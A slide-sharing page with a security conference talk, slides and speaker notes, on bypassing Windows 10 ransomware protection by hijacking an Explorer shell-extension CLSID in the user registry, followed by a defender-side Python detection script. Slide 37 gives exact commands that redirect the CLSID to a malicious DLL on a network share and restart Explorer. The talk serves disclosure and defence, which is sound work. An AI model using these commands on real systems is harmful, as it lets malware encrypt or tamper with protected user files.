Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
Matt Welsh
 
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Natan Silnitsky
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
Neo4j
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
Juraj Vysvader
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
Globus
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
Globus
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Mind IT Systems
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
Globus
 

Recently uploaded (20)

Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket ManagementUtilocate provides Smarter, Better, Faster, Safer Locate Ticket Management

An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami

  • 1. An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
  • 2. My Profile 1992 ~ 2015 software developer of Windows. 2015 ~ security researcher - 2016 AVTOKYO - 2017 BSides Las Vegas - 2018 GrrCON - 2018 ToorCon - 2018 DerbyCon - 2018 AVTOKYO 2018 ~ BSides Tokyo Organizer - 2018 first BSides in East Asia SOYA AOYAMA Researcher @ Fujitsu System Integration Laboratories Ltd Organizer @ BSides Tokyo
  • 3. History 2016 2017 2018 2019 Research the jump the AirGap BSides Las Vegas
  • 7. TANMAY GANACHARYA Principal Group Manager, Windows Defender Research Ransomware protection on Windows 10 For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files. https://www.microsoft.com/security/blog/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access/
  • 12. Windows system folders are NOT protected by default.
  • 17. Ransomware protection Mechanism [diagram: apps are Explorer and cmd (allowed apps) and PowerShell; folders are Documents and Pictures (Protected folders) and System32]
  • 18. You ain’t Seen nothin' yet!
  • 19. Simple Idea [diagram: apps are Explorer and cmd (allowed apps) and PowerShell; folders are Documents and Pictures (Protected folders) and System32]
  • 20. YAGO JESUS MICROSOFT ANTI RANSOMWARE BYPASS By default, Office executables are included in the whitelist so these programs could make changes in protected folders without restrictions. This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically. So a Ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly for the files owner http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html
  • 23. Only using a registry
  • 26. • HKCR = HKLM\Software\Classes + HKCU\Software\Classes • HKLM\Software\Classes < HKCU\Software\Classes (In case of duplication)
  • 27. {90AA3A4E-1CBA-4233-B8BB-535773D48449} • HKLM\SOFTWARE\Classes\CLSID • HKCU\Software\Classes\CLSID
  • 29. How about other antimalware application?
  • 35. No antimalware application can block my malware
  • 36. I submitted the vulnerability report to MSRC
  • 37. This is revenge
    • Step-by-step instructions to reproduce the issue on a fresh install
      1. Put the malicious dll on shared file server. (\\10.0.1.40\share\Anti-ControlledFolderAccess.dll)
      2. Start the cmd.exe on target PC. (An administrator privilege is NOT required)
      3. Execute the following command.
      4. Start the procexp.exe on target PC.
    reg add HKCU\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InprocServer32 /f /ve /t REG_SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll
    taskkill /IM explorer.exe /F
    start explorer.exe
  • 39. Microsoft Security Servicing Criteria for Windows: Security boundaries (Security Boundary / Security Goal)
    - Network boundary: An unauthorized network endpoint cannot access or tamper with the code and data on a customer’s device.
    - Kernel boundary: A non-administrative user mode process cannot access or tamper with kernel code and data. Administrator-to-kernel is not a security boundary.
    - Process boundary: An unauthorized user mode process cannot access or tamper with the code and data of another process.
    - AppContainer sandbox boundary: An AppContainer-based sandbox process cannot access or tamper with code and data outside of the sandbox based on the container capabilities.
    - User boundary: A user cannot access or tamper with the code and data of another user without being authorized.
    - Session boundary: A user logon session cannot access or tamper with another user logon session without being authorized.
    - Web browser boundary: An unauthorized website cannot violate the same-origin policy, nor can it access or tamper with the native code and data of the Microsoft Edge web browser sandbox.
    - Virtual machine boundary: An unauthorized Hyper-V guest virtual machine cannot access or tamper with the code and data of another guest virtual machine; this includes Hyper-V Isolated Containers.
    - Virtual Secure Mode boundary: Data and code within a VSM trustlet or enclave cannot be accessed or tampered with by code executing outside of the VSM trustlet or enclave.
  • 40. NOT covered by active bug bounty programs. Defense-in-depth security features (Security feature / Security Goal)
    - User Account Control (UAC): Prevent unwanted system-wide changes (files, registry, etc) without administrator consent
    - AppLocker: Prevent unauthorized applications from executing
    - Controlled Folder Access: Protect access and modification to controlled folders from apps that may be malicious
    - Mark of the Web (MOTW): Prevent active content download from the web from elevating privileges when viewed locally
    - Kernel Address Space Layout Randomization (KASLR): The layout of the kernel virtual address space is not predictable to an attacker (on 64-bit)
    - Control Flow Guard (CFG): CFG protected code can only make indirect calls to valid indirect call targets
    - Windows Defender Exploit Guard (WDEG): Allow apps to enable additional defense-in-depth exploit mitigation features that make it more difficult to exploit vulnerabilities
    - Protected Process Light (PPL): Prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process functions
    - Shielded Virtual Machines: Help protect a VM’s secrets and its data against malicious fabric admins or malware running on the host from both runtime and offline attacks
    https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
  • 41. I can - Escalate privileges to administrator - Evading the Ransomware Protection By inject to Explorer
  • 42. I’d like to suggest to Microsoft - Load only the signed dll - Implement the ControlledDllLoad mechanism

Editor's Notes

  1. Hello everyone. Today, I’ll give a presentation about "Evading the Ransomware Protection in Windows 10". This is an inconvenient truth for Microsoft. I’ll be happy to answer any questions at the end of my talk.
  2. First, let me introduce myself. I’m Soya Aoyama. I’m a security researcher at Fujitsu System Integration Laboratories Limited, and an organizer of BSides Tokyo. I’ve been working for Fujitsu for more than 20 years as a Windows software developer. I wrote NDIS drivers, Bluetooth profiles, Winsock applications, and more. I started security research about 4 years ago. My first presentation was at AVTOKYO. It’s one of the most famous security conferences in Japan, and its motto is “no drink, no hack”, so I gave that presentation while drinking. To be honest, I’d like to do the same today, but I will refrain.
  3. This is the history of my research. 3 years ago, I was researching jumping the air gap over Wi-Fi. I needed administrator privileges to change the Wi-Fi settings. I replaced OneDrive’s DLL with a malicious one, and injected a malicious program into Explorer. The program injected itself into another application and got administrator privileges. 2 years ago, I talked about that method at BSides Las Vegas. And now, I have found a way to evade the Ransomware Protection in Windows 10 using a malicious DLL. I’ll explain it from now on.
  4. May 12, 2017. Do you remember?
  5. Yes. It’s the day of the cyber-attack by WannaCry. WannaCry caused tremendous damage all over the world.
  6. Microsoft gave one answer against ransomware such as WannaCry. It’s literally...
  7. Ransomware protection!! This is part of a quote from a Microsoft blog. Actually, there is more description, but I didn’t want to read it, so I examined the actual behavior. I’ll explain the behavior of "Ransomware protection" and the minor issues found during the examination.
  8. This is the “Ransomware protection” screen in Windows Defender Security Center. Ransomware protection is off by default, and if you turn it on, “Protected folders” and “Allow an app through Controlled folder access” are displayed. We’ll look at each item in detail.
  9. First, “Protected folders”. You can add the folders that you want to protect. And this is the list of folders protected by default: Documents, Pictures, Videos, Music, Desktop and Favorites. Just a moment. There is the phrase “Windows system folders are protected by default” here. The system folder is usually “c:\windows\system32”. However, that folder is not included in this list.
  10. What is the truth? I’ll show you in a demonstration now. [DEMO 1] The truth is…
  11. What is the truth? I’ll show you in a demonstration now. [DEMO 1] The truth is…
  12. The Windows system folder is not protected by default. I think that Microsoft should rewrite “Windows system folders” to “user data folders”.
  13. Next, “Allow an app through Controlled folder access”. You can add the applications that you want to allow to access the “Protected folders”. Unlike the previous screen, there is no default list. Just a moment. There is the phrase “Apps determined by Microsoft as friendly are always allowed“ here. Which applications are friendly? From the previous demonstration, we know that PowerShell is not covered. It seems that not all Microsoft applications are included in the “friendly” set. Then what about third-party applications?
  14. What is the truth? I’ll show you in a demonstration now. [DEMO 2] The truth is…
  15. What is the truth? I’ll show you in a demonstration now. [DEMO 1] The truth is…
  16. Microsoft only knows.
  17. This is the mechanism of Ransomware protection. By default, all applications have access to all folders. When an administrator enables “Controlled folder access”, only “allowed apps” can access “protected folders”, and other apps cannot. The administrator can add apps to “allowed apps” and folders to “protected folders”.
  18. You Ain’t Seen Nothin’ Yet! Now, I found a vulnerability in “Ransomware protection”.
  19. The idea is very simple. We can probably access the “protected folders” by injecting malware into the “allowed apps”.
  20. As I thought, there was similar research. Yago’s idea is to use Microsoft Office. He succeeded in accessing the protected folders using an OLE object with embedded malware.
  21. What is my method? I’ll show you in a demonstration now. [DEMO 3] My method is…
  22. What is the truth? I’ll show you in a demonstration now. [DEMO 1] The truth is…
  23. Just use the registry. I will explain the mechanism.
  24. Needless to say, it’s the registry. There is a list of shell extensions that Explorer loads. This time, I used this GUID.
  25. The actual value for the GUID is under HKCR. It’s shell32.dll.
  26. HKCR is described on Windows Dev Center. Simply speaking, HKCR merges HKLM with HKCU, and HKCU takes precedence over HKLM. Unlike HKCU, you need administrator privileges to change values in HKLM. This means that values which require administrator privileges to write can be overridden by values writable with user privileges. Is this a bug? No. For example, Explorer is assigned as the default application for decompressing zip files. However, you may want to use a different application like 7-Zip, and this registry location exists for that assignment. This time, I abuse this specification.
  27. For this GUID, there is DLL information in HKLM, but not in HKCU. So if we write another value to HKCU, we can change the value seen in HKCR.
  28. This is the file encryption process. Normally, the value in HKLM is reflected in HKCR; Explorer reads it and loads the correct DLL. However, we can write the path of a malicious DLL into HKCU with user privileges, and that value is reflected in HKCR. Explorer reads it and loads the malicious DLL. As a result, the malicious DLL loaded into Explorer can encrypt the user’s files.
  29. We now understand the “Ransomware protection” of Windows 10. Then, how about other anti-malware applications?
  30. A bit old, but this is the market share of Windows anti-malware application vendors. There are Avast, ESET, Malwarebytes, McAfee, and more. I checked several anti-malware applications.
  31. First, Avast Internet Security. It has the “Ransomware Shield”. However, my malicious DLL was able to encrypt the text file; it was not protected.
  32. Next, ESET Smart Security. It has the “Ransomware Shield”. However, the result was the same.
  33. Next, Malwarebytes Premium. It has the “Ransomware Protection”. However, the result was the same.
  34. Next, McAfee Total Protection. It has the “Ransomware Interceptor”. However, the result was the same.
  35. As far as I’ve checked, anti-malware applications cannot protect against my ransomware. Of course, there may be applications that can protect against it at this time.
  36. 3 years ago, I submitted a vulnerability report to the Microsoft Security Response Center about being able to inject into Explorer using OneDrive’s problem, because I thought it was a very dangerous vulnerability, and I wanted a little pocket money. However, MSRC said they did not have to pay a reward.
  37. This is revenge. Unlike last time, it’s a basic problem of the Windows 10 registry. The result is…
  38. As I thought, it was the same answer, because this does not meet the bar for security servicing.
  39. I cannot receive a reward every time, so I examined the bar for security servicing. Certainly, this problem does not seem to meet it.
  40. Moreover, it was written that “Controlled Folder Access” is not covered by the Bug Bounty program. It cannot be helped. I’ll give up on the reward money.
  41. However, by injecting into Explorer, “Escalate privileges to administrator” and “Evading the Ransomware Protection” are unwavering facts. Is it okay to leave this problem?
  42. Therefore, I’d like to suggest the following implementation to Microsoft as one of the defense-in-depth security features. First, load only signed DLLs. This prevents loading a tampered DLL. The other is to implement a “Controlled DLL load” mechanism. This means that the user selects the DLLs that a process can load, like “Controlled Folder Access”. I think that Microsoft needs to take action as soon as possible, as it does with anything else.
  43. OK, my presentation is over. Thank you very much.
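The registry mechanism described in notes 24 to 28 (HKCR is HKLM\Software\Classes merged with HKCU\Software\Classes, HKCU winning on duplicates, so a per-user InprocServer32 value redirects a class that Explorer loads) and the "load only what is allowed" idea in note 42 can both be turned into a defender-side check. The following is an added example, not code from the talk or from Microsoft: it models the HKCR merge over constructed registry data, lists every CLSID whose HKCU entry shadows a machine-wide entry or points at a location a standard user controls (a UNC share, the user's profile), and ranks the hits. The GUID is the one named in the talk; every path, the 192.0.2.10 share address and the GUIDs beginning 1111/2222/3333 are constructed. On a Windows machine the load_live() helper reads the real hives through Python's standard winreg module (run with --live); the trusted-directory prefixes are a heuristic of this example, not a Microsoft rule.

```python
"""Model the HKCR view Explorer sees and flag per-user CLSID overrides.
Added example, not code from the talk: the registry data is constructed;
load_live() reads the real hives on Windows."""
from __future__ import annotations
import re
import sys
from dataclasses import dataclass

# GUID of the shell extension named in the talk; all paths below are constructed.
SHELL_GUID = "{90AA3A4E-1CBA-4233-B8BB-535773D48449}"

# HKLM\SOFTWARE\Classes\CLSID\<guid>\InprocServer32 (administrator needed to write)
HKLM_CLSID = {
    SHELL_GUID: r"%SystemRoot%\system32\shell32.dll",
    "{11111111-AAAA-BBBB-CCCC-000000000001}": r"%SystemRoot%\system32\vendorext.dll",
    "{22222222-AAAA-BBBB-CCCC-000000000002}": r"C:\Program Files\ExampleVendor\ext.dll",
}
# HKCU\Software\Classes\CLSID\<guid>\InprocServer32 (writable by a standard user)
HKCU_CLSID = {
    # same DLL as HKLM, only the GUID case differs: harmless duplicate
    "{22222222-aaaa-bbbb-cccc-000000000002}": r"C:\Program Files\ExampleVendor\ext.dll",
    # shadows the machine-wide class and points at a share (constructed address)
    SHELL_GUID: r"\\192.0.2.10\share\shadow.dll",
    # user-only class served from the user's own writable profile
    "{33333333-AAAA-BBBB-CCCC-000000000003}": r"C:\Users\alice\AppData\Local\Temp\helper.dll",
}
ENV = {"SystemRoot": "C:\\Windows", "ProgramFiles": "C:\\Program Files"}  # offline %VAR% table
# Heuristic: directories a standard user cannot write to. Not a Microsoft rule.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def expand(path: str) -> str:
    """Strip quotes and expand %VAR% tokens (REG_EXPAND_SZ style) from ENV."""
    return re.sub(r"%(\w+)%", lambda m: ENV.get(m.group(1), m.group(0)), path.strip().strip('"'))

def merge_hkcr(hklm: dict[str, str], hkcu: dict[str, str]) -> dict[str, str]:
    """HKCR = HKLM classes + HKCU classes; on a duplicate GUID the HKCU value wins."""
    merged = {g.upper(): p for g, p in hklm.items()}
    merged.update({g.upper(): p for g, p in hkcu.items()})
    return merged

def is_trusted_location(path: str) -> bool:
    """True under a protected directory; UNC paths and bare names count as untrusted."""
    p = expand(path).lower()
    return not p.startswith("\\\\") and any(p.startswith(t) for t in TRUSTED_PREFIXES)

@dataclass
class Finding:
    clsid: str
    effective_path: str      # what HKCR hands to Explorer
    hklm_path: str | None    # machine-wide value being shadowed, if any
    risk: str                # "high", "medium" or "low"

def find_overrides(hklm: dict[str, str], hkcu: dict[str, str]) -> list[Finding]:
    """Rank HKCU CLSID entries that change what HKCR resolves to."""
    machine = {g.upper(): p for g, p in hklm.items()}
    findings = []
    for guid, user_path in hkcu.items():
        guid = guid.upper()
        machine_path = machine.get(guid)
        shadows = machine_path is not None
        if shadows and expand(machine_path).lower() == expand(user_path).lower():
            continue                 # same DLL: nothing is redirected
        untrusted = not is_trusted_location(user_path)
        if shadows and untrusted:
            risk = "high"            # note 28: machine class redirected to a user-controlled DLL
        elif shadows:
            risk = "medium"          # redirected to a protected location: review it
        elif untrusted:
            risk = "low"             # user-only class loading from a writable path
        else:
            continue
        findings.append(Finding(guid, user_path, machine_path, risk))
    return sorted(findings, key=lambda f: ("high", "medium", "low").index(f.risk))

def load_live(hive: str) -> dict[str, str]:
    """Read <hive>\\Software\\Classes\\CLSID\\*\\InprocServer32 on Windows (winreg)."""
    import winreg  # standard library, Windows only
    root = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}[hive]
    out: dict[str, str] = {}
    with winreg.OpenKey(root, r"Software\Classes\CLSID") as key:
        index = 0
        while True:
            try:
                guid = winreg.EnumKey(key, index)
            except OSError:
                return out           # no more subkeys
            index += 1
            try:
                out[guid.upper()] = winreg.QueryValue(key, guid + r"\InprocServer32")
            except OSError:
                pass                 # class has no in-process server

def main() -> None:
    live = sys.platform == "win32" and "--live" in sys.argv
    hklm, hkcu = (load_live("HKLM"), load_live("HKCU")) if live else (HKLM_CLSID, HKCU_CLSID)
    for f in find_overrides(hklm, hkcu):
        print(f"[{f.risk:>6}] {f.clsid} -> {f.effective_path} (HKLM: {f.hklm_path})")

if __name__ == "__main__":
    main()
```

A "high" hit is exactly the situation in note 28: a machine-wide class redirected by a user-writable key to a DLL outside protected locations. Running this view periodically, or alerting on writes under HKCU\Software\Classes\CLSID\*\InprocServer32, gives a detection point that does not depend on the anti-malware products compared in notes 31 to 34; a per-process allow-list of loadable DLL locations, as note 42 proposes, would stop the load itself rather than detect it afterwards.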